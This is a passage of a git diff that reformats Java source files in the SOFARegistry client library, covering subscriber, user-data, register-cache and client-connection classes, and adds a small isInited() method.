SubscriberDataObserver dataObserver; - private ConcurrentHashMap data = new ConcurrentHashMap(); - private AtomicBoolean init = new AtomicBoolean(false); - private RegistryClientConfig config; - private SubscriberRegistration registration; - private Worker worker; - private volatile String localZone; - private List availableSegments = new ArrayList(); + private final String REGIST_ID; + private SubscriberDataObserver dataObserver; + private ConcurrentHashMap data = + new ConcurrentHashMap(); + private AtomicBoolean init = new AtomicBoolean(false); + private RegistryClientConfig config; + private SubscriberRegistration registration; + private Worker worker; + private volatile String localZone; + private List availableSegments = new ArrayList(); - /** - * Instantiates a new Default subscriber multi. - * - * @param registration the registration - */ - DefaultSubscriber(SubscriberRegistration registration, Worker worker, - RegistryClientConfig config) { - if (null != registration) { - this.dataObserver = registration.getSubscriberDataObserver(); - } - this.registration = registration; - this.worker = worker; - this.config = config; - this.REGIST_ID = UUID.randomUUID().toString(); - this.localZone = config.getZone(); - this.getPubVersion().incrementAndGet(); + /** + * Instantiates a new Default subscriber multi. + * + * @param registration the registration + */ + DefaultSubscriber( + SubscriberRegistration registration, Worker worker, RegistryClientConfig config) { + if (null != registration) { + this.dataObserver = registration.getSubscriberDataObserver(); } + this.registration = registration; + this.worker = worker; + this.config = config; + this.REGIST_ID = UUID.randomUUID().toString(); + this.localZone = config.getZone(); + this.getPubVersion().incrementAndGet(); + } - /** - * @see Subscriber#getDataObserver() - */ - @Override - public SubscriberDataObserver getDataObserver() { - return dataObserver; - } + /** @see Subscriber#getDataObserver() */ + @Override + public SubscriberDataObserver getDataObserver() { + return dataObserver; + } - /** - * @see Subscriber#setDataObserver(SubscriberDataObserver) - */ - @Override - public void setDataObserver(SubscriberDataObserver dataObserver) { - this.dataObserver = dataObserver; - } + /** @see Subscriber#setDataObserver(SubscriberDataObserver) */ + @Override + public void setDataObserver(SubscriberDataObserver dataObserver) { + this.dataObserver = dataObserver; + } - /** - * @see Subscriber#peekData() - */ - @Override - public UserData peekData() { - readLock.lock(); - try { - if (!init.get()) { - //todo sync read from server - return new DefaultUserData(); - } - Set> values = data.entrySet(); - DefaultUserData userData = new DefaultUserData(); - if (null == localZone) { - userData.setLocalZone(config.getZone()); - } else { - userData.setLocalZone(localZone); - } - Map> zoneMap = new HashMap>(); - for (Entry segmentDataEntry : values) { - String segment = segmentDataEntry.getKey(); + /** @see Subscriber#peekData() */ + @Override + public UserData peekData() { + readLock.lock(); + try { + if (!init.get()) { + // todo sync read from server + return new DefaultUserData(); + } + Set> values = data.entrySet(); + DefaultUserData userData = new DefaultUserData(); + if (null == localZone) { + userData.setLocalZone(config.getZone()); + } else { + userData.setLocalZone(localZone); + } + Map> zoneMap = new HashMap>(); + for (Entry segmentDataEntry : values) { + String segment = segmentDataEntry.getKey(); - // only accept available segments, when available segments is empty accept all - if (CommonUtils.isNotEmpty(availableSegments) - && !availableSegments.contains(segment)) { - continue; - } + // only accept available segments, when available segments is empty accept all + if (CommonUtils.isNotEmpty(availableSegments) && !availableSegments.contains(segment)) { + continue; + } - SegmentData segmentData = segmentDataEntry.getValue(); + SegmentData segmentData = segmentDataEntry.getValue(); - if (null == segmentData) { - continue; - } + if (null == segmentData) { + continue; + } - Map> data = segmentData.getData(); - for (Entry> entry : data.entrySet()) { - String zone = entry.getKey(); - List resultList = zoneMap.get(zone); - if (null == resultList) { - resultList = new ArrayList(); - zoneMap.put(zone, resultList); - } - List dataList = entry.getValue(); - for (DataBox dataBox : dataList) { - resultList.add(dataBox.getData()); - } - } - } - userData.setZoneData(zoneMap); - return userData; - } finally { - readLock.unlock(); + Map> data = segmentData.getData(); + for (Entry> entry : data.entrySet()) { + String zone = entry.getKey(); + List resultList = zoneMap.get(zone); + if (null == resultList) { + resultList = new ArrayList(); + zoneMap.put(zone, resultList); + } + List dataList = entry.getValue(); + for (DataBox dataBox : dataList) { + resultList.add(dataBox.getData()); + } } + } + userData.setZoneData(zoneMap); + return userData; + } finally { + readLock.unlock(); } + } - /** - * Gets scope enum. - * - * @return the scope enum - */ - @Override - public ScopeEnum getScopeEnum() { - return registration.getScopeEnum(); - } + /** + * Gets scope enum. + * + * @return the scope enum + */ + @Override + public ScopeEnum getScopeEnum() { + return registration.getScopeEnum(); + } - /** - * Unregister. - */ - @Override - public void unregister() { - if (isEnabled()) { - super.unregister(); - worker.schedule(new TaskEvent(this)); - } + /** Unregister. */ + @Override + public void unregister() { + if (isEnabled()) { + super.unregister(); + worker.schedule(new TaskEvent(this)); } + } - /** - * Assembly subscriber register. - * - * @return the subscriber register - */ - @Override - public SubscriberRegister assembly() { - readLock.lock(); - SubscriberRegister register; - try { - if (null == registration.getScopeEnum()) { - registration.setScopeEnum(ScopeEnum.zone); - } + /** + * Assembly subscriber register. + * + * @return the subscriber register + */ + @Override + public SubscriberRegister assembly() { + readLock.lock(); + SubscriberRegister register; + try { + if (null == registration.getScopeEnum()) { + registration.setScopeEnum(ScopeEnum.zone); + } - register = new SubscriberRegister(); - register.setInstanceId(config.getInstanceId()); - if (StringUtils.isNotEmpty(config.getZone())) { - register.setZone(config.getZone()); - } else { - register.setZone(ValueConstants.DEFAULT_ZONE); - } - if (StringUtils.isNotEmpty(registration.getAppName())) { - register.setAppName(registration.getAppName()); - } else { - register.setAppName(config.getAppName()); - } - register.setDataId(registration.getDataId()); - register.setGroup(registration.getGroup()); - register.setRegistId(REGIST_ID); - register.setVersion(this.getPubVersion().get()); - register.setTimestamp(this.getTimestamp()); - register.setScope(registration.getScopeEnum().name()); + register = new SubscriberRegister(); + register.setInstanceId(config.getInstanceId()); + if (StringUtils.isNotEmpty(config.getZone())) { + register.setZone(config.getZone()); + } else { + register.setZone(ValueConstants.DEFAULT_ZONE); + } + if (StringUtils.isNotEmpty(registration.getAppName())) { + register.setAppName(registration.getAppName()); + } else { + register.setAppName(config.getAppName()); + } + register.setDataId(registration.getDataId()); + register.setGroup(registration.getGroup()); + register.setRegistId(REGIST_ID); + register.setVersion(this.getPubVersion().get()); + register.setTimestamp(this.getTimestamp()); + register.setScope(registration.getScopeEnum().name()); - // auth signature - setAuthSignature(register); + // auth signature + setAuthSignature(register); - if (isEnabled()) { - register.setEventType(EventTypeConstants.REGISTER); - } else { - register.setEventType(EventTypeConstants.UNREGISTER); - } - } finally { - readLock.unlock(); - } - return register; + if (isEnabled()) { + register.setEventType(EventTypeConstants.REGISTER); + } else { + register.setEventType(EventTypeConstants.UNREGISTER); + } + } finally { + readLock.unlock(); } + return register; + } - public void putReceivedData(SegmentData segmentData, String localZone) { - writeLock.lock(); - try { - putSegmentData(segmentData); - this.localZone = localZone; - } finally { - writeLock.unlock(); - } + public void putReceivedData(SegmentData segmentData, String localZone) { + writeLock.lock(); + try { + putSegmentData(segmentData); + this.localZone = localZone; + } finally { + writeLock.unlock(); } + } - private void putSegmentData(SegmentData segmentData) { - if (null != segmentData) { + private void putSegmentData(SegmentData segmentData) { + if (null != segmentData) { - SegmentData existsData = data.putIfAbsent(segmentData.getSegment(), segmentData); - if (null == existsData) { - init.compareAndSet(false, true); - return; - } + SegmentData existsData = data.putIfAbsent(segmentData.getSegment(), segmentData); + if (null == existsData) { + init.compareAndSet(false, true); + return; + } - if (existsData.getVersion() < segmentData.getVersion()) { - boolean result = data.replace(segmentData.getSegment(), existsData, segmentData); - if (!result) { - putSegmentData(segmentData); - } - init.compareAndSet(false, true); - } + if (existsData.getVersion() < segmentData.getVersion()) { + boolean result = data.replace(segmentData.getSegment(), existsData, segmentData); + if (!result) { + putSegmentData(segmentData); } + init.compareAndSet(false, true); + } } + } - /** - * Gets data id. - * - * @return the data id - */ - @Override - public String getDataId() { - return registration.getDataId(); - } + /** + * Gets data id. + * + * @return the data id + */ + @Override + public String getDataId() { + return registration.getDataId(); + } - /** - * Gets group. - * - * @return the group - */ - @Override - public String getGroup() { - return registration.getGroup(); - } + /** + * Gets group. + * + * @return the group + */ + @Override + public String getGroup() { + return registration.getGroup(); + } - /** - * Gets regist id. - * - * @return the regist id - */ - @Override - public String getRegistId() { - return REGIST_ID; - } + /** + * Gets regist id. + * + * @return the regist id + */ + @Override + public String getRegistId() { + return REGIST_ID; + } - /** - * Getter method for property availableSegments. - * - * @return property value of availableSegments - */ - public List getAvailableSegments() { - readLock.lock(); - try { - return new ArrayList(availableSegments); - } finally { - readLock.unlock(); - } + /** + * Getter method for property availableSegments. + * + * @return property value of availableSegments + */ + public List getAvailableSegments() { + readLock.lock(); + try { + return new ArrayList(availableSegments); + } finally { + readLock.unlock(); } + } - /** - * Setter method for property availableSegments. - * - * @param availableSegments value to be assigned to property availableSegments - */ - public void setAvailableSegments(List availableSegments) { - writeLock.lock(); - try { - if (null == availableSegments) { - this.availableSegments = new ArrayList(); - } else { - this.availableSegments = new ArrayList(availableSegments); - } - } finally { - writeLock.unlock(); - } + /** + * Setter method for property availableSegments. + * + * @param availableSegments value to be assigned to property availableSegments + */ + public void setAvailableSegments(List availableSegments) { + writeLock.lock(); + try { + if (null == availableSegments) { + this.availableSegments = new ArrayList(); + } else { + this.availableSegments = new ArrayList(availableSegments); + } + } finally { + writeLock.unlock(); } + } - @Override - public String toString() { - return "DefaultSubscriber{" + "registration=" + registration + '}' + super.toString(); - } + public boolean isInited() { + return init.get(); + } + + @Override + public String toString() { + return "DefaultSubscriber{" + "registration=" + registration + '}' + super.toString(); + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultUserData.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultUserData.java index a47d52b28..2c88bf201 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultUserData.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultUserData.java @@ -17,70 +17,67 @@ package com.alipay.sofa.registry.client.provider; import com.alipay.sofa.registry.client.api.model.UserData; - import java.util.List; import java.util.Map; import java.util.concurrent.ConcurrentHashMap; /** - * * @author zhuoyu.sjw * @version $Id: DefaultUserData.java, v 0.1 2017-11-30 21:01 zhuoyu.sjw Exp $$ */ public class DefaultUserData implements UserData { - /** zone, List */ - private Map> zoneData = new ConcurrentHashMap>(); + /** zone, List */ + private Map> zoneData = new ConcurrentHashMap>(); - /** The current client`s zone */ - private String localZone; + /** The current client`s zone */ + private String localZone; - /** - * Getter method for property zoneData. - * - * @return property value of zoneData - */ - @Override - public Map> getZoneData() { - return zoneData; - } + /** + * Getter method for property zoneData. + * + * @return property value of zoneData + */ + @Override + public Map> getZoneData() { + return zoneData; + } - /** - * Setter method for property zoneData. - * - * @param zoneData value to be assigned to property zoneData - */ - public void setZoneData(Map> zoneData) { - this.zoneData = zoneData; - } + /** + * Setter method for property zoneData. + * + * @param zoneData value to be assigned to property zoneData + */ + public void setZoneData(Map> zoneData) { + this.zoneData = zoneData; + } - /** - * Getter method for property localZone. - * - * @return property value of localZone - */ - @Override - public String getLocalZone() { - return localZone; - } + /** + * Getter method for property localZone. + * + * @return property value of localZone + */ + @Override + public String getLocalZone() { + return localZone; + } - /** - * Setter method for property localZone. - * - * @param localZone value to be assigned to property localZone - */ - public void setLocalZone(String localZone) { - this.localZone = localZone; - } + /** + * Setter method for property localZone. + * + * @param localZone value to be assigned to property localZone + */ + public void setLocalZone(String localZone) { + this.localZone = localZone; + } - /** - * To string string. - * - * @return the string - */ - @Override - public String toString() { - return "DefaultUserData{" + "zoneData=" + zoneData + ", localZone='" + localZone + '\'' - + '}'; - } + /** + * To string string. + * + * @return the string + */ + @Override + public String toString() { + return "DefaultUserData{" + "zoneData=" + zoneData + ", localZone='" + localZone + '\'' + '}'; + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/RegisterCache.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/RegisterCache.java index ee35272a8..58f88eeb5 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/RegisterCache.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/RegisterCache.java @@ -20,7 +20,6 @@ import com.alipay.sofa.registry.client.api.Publisher; import com.alipay.sofa.registry.client.api.Subscriber; import com.alipay.sofa.registry.client.util.StringUtils; - import java.util.ArrayList; import java.util.Collection; import java.util.Map; @@ -28,130 +27,125 @@ /** * The type Register cache. + * * @author zhuoyu.sjw * @version $Id : RegisterCache.java, v 0.1 2017-11-30 18:18 zhuoyu.sjw Exp $$ */ public class RegisterCache { - /** - * publisher register cache Map - */ - private Map publisherMap = new ConcurrentHashMap(); - /** - * subscriber register cache Map - */ - private Map subscriberMap = new ConcurrentHashMap(); - /** - * configurator register cache Map - */ - private Map configuratorMap = new ConcurrentHashMap(); - - /** - * Add register. - * - * @param publisher the publisher - */ - public void addRegister(Publisher publisher) { - if (null == publisher || StringUtils.isEmpty(publisher.getDataId())) { - return; - } - - publisherMap.put(publisher.getRegistId(), publisher); - } - - /** - * Add register. - * - * @param subscriber the subscriber - */ - public void addRegister(Subscriber subscriber) { - if (null == subscriber || StringUtils.isEmpty(subscriber.getDataId())) { - return; - } - - subscriberMap.put(subscriber.getRegistId(), subscriber); - } - - /** - * Add register. - * - * @param configurator the configurator - */ - public void addRegister(Configurator configurator) { - if (null == configurator || StringUtils.isEmpty(configurator.getDataId())) { - return; - } - - configuratorMap.put(configurator.getRegistId(), configurator); - } - - /** - * Remove. - * - * @param registId the regist id - */ - public void remove(String registId) { - if (publisherMap.remove(registId) == null) { - if (subscriberMap.remove(registId) == null) { - configuratorMap.remove(registId); - } - } - } - - /** - * Gets publisher by regist id. - * - * @param registId the regist id - * @return the publisher by regist id - */ - public Publisher getPublisherByRegistId(String registId) { - return publisherMap.get(registId); - } - - /** - * Gets subscriber by regist id. - * - * @param registId the regist id - * @return the subscriber by regist id - */ - public Subscriber getSubscriberByRegistId(String registId) { - return subscriberMap.get(registId); - } - - /** - * Gets configurator by data id. - * - * @param registId the regist id - * @return the configurator by data id - */ - public Configurator getConfiguratorByRegistId(String registId) { - return configuratorMap.get(registId); + /** publisher register cache Map */ + private Map publisherMap = new ConcurrentHashMap(); + /** subscriber register cache Map */ + private Map subscriberMap = new ConcurrentHashMap(); + /** configurator register cache Map */ + private Map configuratorMap = new ConcurrentHashMap(); + + /** + * Add register. + * + * @param publisher the publisher + */ + public void addRegister(Publisher publisher) { + if (null == publisher || StringUtils.isEmpty(publisher.getDataId())) { + return; } - /** - * Gets all publishers. - * - * @return the all publishers - */ - public Collection getAllPublishers() { - return new ArrayList(publisherMap.values()); + publisherMap.put(publisher.getRegistId(), publisher); + } + + /** + * Add register. + * + * @param subscriber the subscriber + */ + public void addRegister(Subscriber subscriber) { + if (null == subscriber || StringUtils.isEmpty(subscriber.getDataId())) { + return; } - /** - * Gets all subscribers. - * - * @return the all subscribers - */ - public Collection getAllSubscribers() { - return new ArrayList(subscriberMap.values()); + subscriberMap.put(subscriber.getRegistId(), subscriber); + } + + /** + * Add register. + * + * @param configurator the configurator + */ + public void addRegister(Configurator configurator) { + if (null == configurator || StringUtils.isEmpty(configurator.getDataId())) { + return; } - /** - * Gets all configurator. - * - * @return the all configurator - */ - public Collection getAllConfigurator() { - return new ArrayList(configuratorMap.values()); + configuratorMap.put(configurator.getRegistId(), configurator); + } + + /** + * Remove. + * + * @param registId the regist id + */ + public void remove(String registId) { + if (publisherMap.remove(registId) == null) { + if (subscriberMap.remove(registId) == null) { + configuratorMap.remove(registId); + } } + } + + /** + * Gets publisher by regist id. + * + * @param registId the regist id + * @return the publisher by regist id + */ + public Publisher getPublisherByRegistId(String registId) { + return publisherMap.get(registId); + } + + /** + * Gets subscriber by regist id. + * + * @param registId the regist id + * @return the subscriber by regist id + */ + public Subscriber getSubscriberByRegistId(String registId) { + return subscriberMap.get(registId); + } + + /** + * Gets configurator by data id. + * + * @param registId the regist id + * @return the configurator by data id + */ + public Configurator getConfiguratorByRegistId(String registId) { + return configuratorMap.get(registId); + } + + /** + * Gets all publishers. + * + * @return the all publishers + */ + public Collection getAllPublishers() { + return new ArrayList(publisherMap.values()); + } + + /** + * Gets all subscribers. + * + * @return the all subscribers + */ + public Collection getAllSubscribers() { + return new ArrayList(subscriberMap.values()); + } + + /** + * Gets all configurator. + * + * @return the all configurator + */ + public Collection getAllConfigurator() { + return new ArrayList(configuratorMap.values()); + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/Client.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/Client.java index 888a31d07..b8e006729 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/Client.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/Client.java @@ -20,37 +20,36 @@ /** * The interface Client. + * * @author zhuoyu.sjw * @version $Id : Client.java, v 0.1 2018-03-06 20:43 zhuoyu.sjw Exp $$ */ public interface Client { - /** - * Init. - */ - void init(); + /** Init. */ + void init(); - /** - * Is connected boolean. - * - * @return the boolean - */ - boolean isConnected(); + /** + * Is connected boolean. + * + * @return the boolean + */ + boolean isConnected(); - /** - * Ensure connected. - * - * @throws InterruptedException the interrupted exception - */ - void ensureConnected() throws InterruptedException; + /** + * Ensure connected. + * + * @throws InterruptedException the interrupted exception + */ + void ensureConnected() throws InterruptedException; - /** - * Invoke sync object. - * - * @param request the request - * @return the object - * @throws RemotingException the remoting exception - * @throws InterruptedException the interrupted exception - */ - Object invokeSync(Object request) throws RemotingException, InterruptedException; + /** + * Invoke sync object. + * + * @param request the request + * @return the object + * @throws RemotingException the remoting exception + * @throws InterruptedException the interrupted exception + */ + Object invokeSync(Object request) throws RemotingException, InterruptedException; } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ClientConnection.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ClientConnection.java index 320b565ff..7d4e5ea6e 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ClientConnection.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ClientConnection.java @@ -30,8 +30,6 @@ import com.alipay.sofa.registry.client.provider.RegisterCache; import com.alipay.sofa.registry.client.task.TaskEvent; import com.alipay.sofa.registry.client.task.Worker; -import org.slf4j.Logger; - import java.util.ArrayList; import java.util.Collection; import java.util.Collections; @@ -39,262 +37,263 @@ import java.util.Map; import java.util.Map.Entry; import java.util.Random; +import org.slf4j.Logger; /** * The type Client connection. + * * @author zhuoyu.sjw * @version $Id : ClientConnection.java, v 0.1 2018-03-01 16:44 zhuoyu.sjw Exp $$ */ public class ClientConnection implements Client { - /** LOGGER */ - private static final Logger LOGGER = LoggerFactory - .getLogger(ClientConnection.class); - /** - * The Reconnecting delay. - */ - private final static int RECONNECTING_DELAY = 5000; - private RpcClient client; - private ServerManager serverManager; - private List userProcessorList; - private Map connectionEventProcessorMap; - private RegistryClientConfig config; - private Connection clientConnection; - private RegisterCache registerCache; - private Worker worker; - - /** - * Instantiates a new Client connection. - * - * @param serverManager the server manager - * @param userProcessorList the user processor list - * @param connectionEventProcessorMap the connection event processor map - * @param config the config - */ - public ClientConnection(ServerManager serverManager, - List userProcessorList, - Map connectionEventProcessorMap, - RegisterCache registerCache, RegistryClientConfig config) { - this.client = new RpcClient(); - this.serverManager = serverManager; - this.userProcessorList = userProcessorList; - this.connectionEventProcessorMap = connectionEventProcessorMap; - this.registerCache = registerCache; - this.config = config; - } + /** LOGGER */ + private static final Logger LOGGER = LoggerFactory.getLogger(ClientConnection.class); + /** The Reconnecting delay. */ + private static final int RECONNECTING_DELAY = 5000; - /** - * Init. - */ - @Override - public void init() { - for (UserProcessor userProcessor : userProcessorList) { - client.registerUserProcessor(userProcessor); - } + private RpcClient client; + private ServerManager serverManager; + private List userProcessorList; + private Map connectionEventProcessorMap; + private RegistryClientConfig config; + private Connection clientConnection; + private RegisterCache registerCache; + private Worker worker; - if (null != connectionEventProcessorMap) { - for (Entry entry : connectionEventProcessorMap - .entrySet()) { - client.addConnectionEventProcessor(entry.getKey(), entry.getValue()); - } - } + /** + * Instantiates a new Client connection. + * + * @param serverManager the server manager + * @param userProcessorList the user processor list + * @param connectionEventProcessorMap the connection event processor map + * @param config the config + */ + public ClientConnection( + ServerManager serverManager, + List userProcessorList, + Map connectionEventProcessorMap, + RegisterCache registerCache, + RegistryClientConfig config) { + this.client = new RpcClient(); + this.serverManager = serverManager; + this.userProcessorList = userProcessorList; + this.connectionEventProcessorMap = connectionEventProcessorMap; + this.registerCache = registerCache; + this.config = config; + } - client.init(); + /** Init. */ + @Override + public void init() { + for (UserProcessor userProcessor : userProcessorList) { + client.registerUserProcessor(userProcessor); } - /** - * Ensure connected. - * - * @throws InterruptedException the interrupted exception - */ - @Override - public void ensureConnected() throws InterruptedException { - if (isConnected()) { - return; - } - while (!connect()) { - Thread.sleep(ClientConnection.RECONNECTING_DELAY); - } + if (null != connectionEventProcessorMap) { + for (Entry entry : + connectionEventProcessorMap.entrySet()) { + client.addConnectionEventProcessor(entry.getKey(), entry.getValue()); + } } - /** - * Connect boolean. - * - * @return the boolean - */ - private boolean connect() { - Random random = new Random(); - Connection connection = null; - List serverNodes = new ArrayList(serverManager.getServerList()); - // shuffle server list to make server connections as discrete as possible - Collections.shuffle(serverNodes); - for (ServerNode serverNode : serverNodes) { - try { - connection = connect(serverNode); - if (null != connection && connection.isFine()) { - resetRegister(); - LOGGER.info("[Connect] Successfully connected to server: {}", serverNode); - break; - } else { - recycle(connection); - } + client.init(); + } - Thread.sleep(random.nextInt(RECONNECTING_DELAY)); - } catch (Exception e) { - LOGGER.error("[Connect] Failed trying connect to {}", serverNode, e); - } - } + /** + * Ensure connected. + * + * @throws InterruptedException the interrupted exception + */ + @Override + public void ensureConnected() throws InterruptedException { + if (isConnected()) { + return; + } + while (!connect()) { + Thread.sleep(ClientConnection.RECONNECTING_DELAY); + } + } + /** + * Connect boolean. + * + * @return the boolean + */ + private boolean connect() { + Random random = new Random(); + Connection connection = null; + List serverNodes = new ArrayList(serverManager.getServerList()); + // shuffle server list to make server connections as discrete as possible + Collections.shuffle(serverNodes); + for (ServerNode serverNode : serverNodes) { + try { + connection = connect(serverNode); if (null != connection && connection.isFine()) { - clientConnection = connection; - return true; + resetRegister(); + LOGGER.info("[Connect] Successfully connected to server: {}", serverNode); + break; + } else { + recycle(connection); } - return false; + + Thread.sleep(random.nextInt(RECONNECTING_DELAY)); + } catch (Exception e) { + LOGGER.error("[Connect] Failed trying connect to {}", serverNode, e); + } } - /** - * Invoke sync object. - * - * @param request the request - * @return the object - * @throws RemotingException the remoting exception - * @throws InterruptedException the interrupted exception - */ - @Override - public Object invokeSync(Object request) throws RemotingException, InterruptedException { - if (!isConnected()) { - throw new IllegalStateException("Not connected"); - } + if (null != connection && connection.isFine()) { + clientConnection = connection; + return true; + } + return false; + } - return client.invokeSync(clientConnection, request, config.getInvokeTimeout()); + /** + * Invoke sync object. + * + * @param request the request + * @return the object + * @throws RemotingException the remoting exception + * @throws InterruptedException the interrupted exception + */ + @Override + public Object invokeSync(Object request) throws RemotingException, InterruptedException { + if (!isConnected()) { + throw new IllegalStateException("Not connected"); } - private void recycle(Connection connection) { - if (null == connection) { - return; - } + return client.invokeSync(clientConnection, request, config.getInvokeTimeout()); + } + + private void recycle(Connection connection) { + if (null == connection) { + return; + } - client.closeConnection(connection.getUrl()); + client.closeConnection(connection.getUrl()); + } + + private Connection connect(ServerNode serverNode) { + Connection connection = null; + try { + connection = client.getConnection(serverNode.getUrl(), config.getConnectTimeout()); + } catch (Exception e) { + LOGGER.error("[connection] Create connection error, {}", serverNode, e); } + return connection; + } + + private void resetRegister() { + try { + List eventList = new ArrayList(); - private Connection connect(ServerNode serverNode) { - Connection connection = null; + Collection publishers = registerCache.getAllPublishers(); + for (Publisher publisher : publishers) { try { - connection = client.getConnection(serverNode.getUrl(), config.getConnectTimeout()); + publisher.reset(); + eventList.add(new TaskEvent(publisher)); } catch (Exception e) { - LOGGER.error("[connection] Create connection error, {}", serverNode, e); + LOGGER.error("[connection] Publisher reset error, {}", publisher, e); } - return connection; - } + } - private void resetRegister() { + Collection subscribers = registerCache.getAllSubscribers(); + for (Subscriber subscriber : subscribers) { try { - List eventList = new ArrayList(); - - Collection publishers = registerCache.getAllPublishers(); - for (Publisher publisher : publishers) { - try { - publisher.reset(); - eventList.add(new TaskEvent(publisher)); - } catch (Exception e) { - LOGGER.error("[connection] Publisher reset error, {}", publisher, e); - } - } - - Collection subscribers = registerCache.getAllSubscribers(); - for (Subscriber subscriber : subscribers) { - try { - subscriber.reset(); - eventList.add(new TaskEvent(subscriber)); - } catch (Exception e) { - LOGGER.error("[connection] Subscriber reset error, {}", subscriber, e); - } - } - - Collection configurators = registerCache.getAllConfigurator(); - for (Configurator configurator : configurators) { - try { - configurator.reset(); - eventList.add(new TaskEvent(configurator)); - } catch (Exception e) { - LOGGER.error("[connection] Configurator reset error, {}", configurator, e); - } - } - - worker.schedule(eventList); - LOGGER.info("[reset] {} publishers and {} subscribers has been reset", - publishers.size(), subscribers.size()); + subscriber.reset(); + eventList.add(new TaskEvent(subscriber)); } catch (Exception e) { - LOGGER.error("[reset] Reset register after reconnect error", e); + LOGGER.error("[connection] Subscriber reset error, {}", subscriber, e); } - } + } - /** - * Gets remote address. - * - * @return the remote address - */ - public String getRemoteAddress() { - if (null != clientConnection) { - return clientConnection.getRemoteIP(); + Collection configurators = registerCache.getAllConfigurator(); + for (Configurator configurator : configurators) { + try { + configurator.reset(); + eventList.add(new TaskEvent(configurator)); + } catch (Exception e) { + LOGGER.error("[connection] Configurator reset error, {}", configurator, e); } - return null; - } + } - /** - * Is connected boolean. - * - * @return boolean boolean - */ - @Override - public boolean isConnected() { - return clientConnection != null && clientConnection.isFine(); + worker.schedule(eventList); + LOGGER.info( + "[reset] {} publishers and {} subscribers has been reset", + publishers.size(), + subscribers.size()); + } catch (Exception e) { + LOGGER.error("[reset] Reset register after reconnect error", e); } + } - /** - * Destroy. - */ - public void destroy() { - if (null != clientConnection) { - clientConnection.close(); - } - if (null != client) { - client.shutdown(); - } + /** + * Gets remote address. + * + * @return the remote address + */ + public String getRemoteAddress() { + if (null != clientConnection) { + return clientConnection.getRemoteIP(); } + return null; + } - /** - * Setter method for property serverManager. - * - * @param serverManager value to be assigned to property serverManager - */ - public void setServerManager(ServerManager serverManager) { - this.serverManager = serverManager; - } + /** + * Is connected boolean. + * + * @return boolean boolean + */ + @Override + public boolean isConnected() { + return clientConnection != null && clientConnection.isFine(); + } - /** - * Setter method for property userProcessorList. - * - * @param userProcessorList value to be assigned to property userProcessorList - */ - public void setUserProcessorList(List userProcessorList) { - this.userProcessorList = userProcessorList; + /** Destroy. */ + public void destroy() { + if (null != clientConnection) { + clientConnection.close(); } - - /** - * Setter method for property connectionEventProcessorMap. - * - * @param connectionEventProcessorMap value to be assigned to property connectionEventProcessorMap - */ - public void setConnectionEventProcessorMap(Map connectionEventProcessorMap) { - this.connectionEventProcessorMap = connectionEventProcessorMap; + if (null != client) { + client.shutdown(); } + } - /** - * Setter method for property worker. - * - * @param worker value to be assigned to property worker - */ - public void setWorker(Worker worker) { - this.worker = worker; - } + /** + * Setter method for property serverManager. + * + * @param serverManager value to be assigned to property serverManager + */ + public void setServerManager(ServerManager serverManager) { + this.serverManager = serverManager; + } + + /** + * Setter method for property userProcessorList. + * + * @param userProcessorList value to be assigned to property userProcessorList + */ + public void setUserProcessorList(List userProcessorList) { + this.userProcessorList = userProcessorList; + } + + /** + * Setter method for property connectionEventProcessorMap. + * + * @param connectionEventProcessorMap value to be assigned to property connectionEventProcessorMap + */ + public void setConnectionEventProcessorMap( + Map connectionEventProcessorMap) { + this.connectionEventProcessorMap = connectionEventProcessorMap; + } + + /** + * Setter method for property worker. + * + * @param worker value to be assigned to property worker + */ + public void setWorker(Worker worker) { + this.worker = worker; + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ClientConnectionCloseEventProcessor.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ClientConnectionCloseEventProcessor.java index b8b112368..c29a97d33 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ClientConnectionCloseEventProcessor.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ClientConnectionCloseEventProcessor.java @@ -23,24 +23,27 @@ /** * The type Client connection close event processor. + * * @author zhuoyu.sjw * @version $Id : ClientConnectionCloseEventProcessor.java, v 0.1 2018-02-26 20:28 zhuoyu.sjw Exp $$ */ public class ClientConnectionCloseEventProcessor implements ConnectionEventProcessor { - private static final Logger LOGGER = LoggerFactory - .getLogger(ClientConnectionCloseEventProcessor.class); + private static final Logger LOGGER = + LoggerFactory.getLogger(ClientConnectionCloseEventProcessor.class); - /** - * On event. - * - * @param remoteAddr the remote addr - * @param conn the conn - */ - @Override - public void onEvent(String remoteAddr, Connection conn) { - if (null != conn) { - LOGGER.info("[connection] Client disconnected, remote address: {}, localAddress: {}", - remoteAddr, conn.getLocalAddress()); - } + /** + * On event. + * + * @param remoteAddr the remote addr + * @param conn the conn + */ + @Override + public void onEvent(String remoteAddr, Connection conn) { + if (null != conn) { + LOGGER.info( + "[connection] Client disconnected, remote address: {}, localAddress: {}", + remoteAddr, + conn.getLocalAddress()); } + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ClientConnectionOpenEventProcessor.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ClientConnectionOpenEventProcessor.java index 7ee2ee987..dee73a914 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ClientConnectionOpenEventProcessor.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ClientConnectionOpenEventProcessor.java @@ -23,24 +23,27 @@ /** * The type Client connection close event processor. + * * @author zhuoyu.sjw * @version $Id : ClientConnectionCloseEventProcessor.java, v 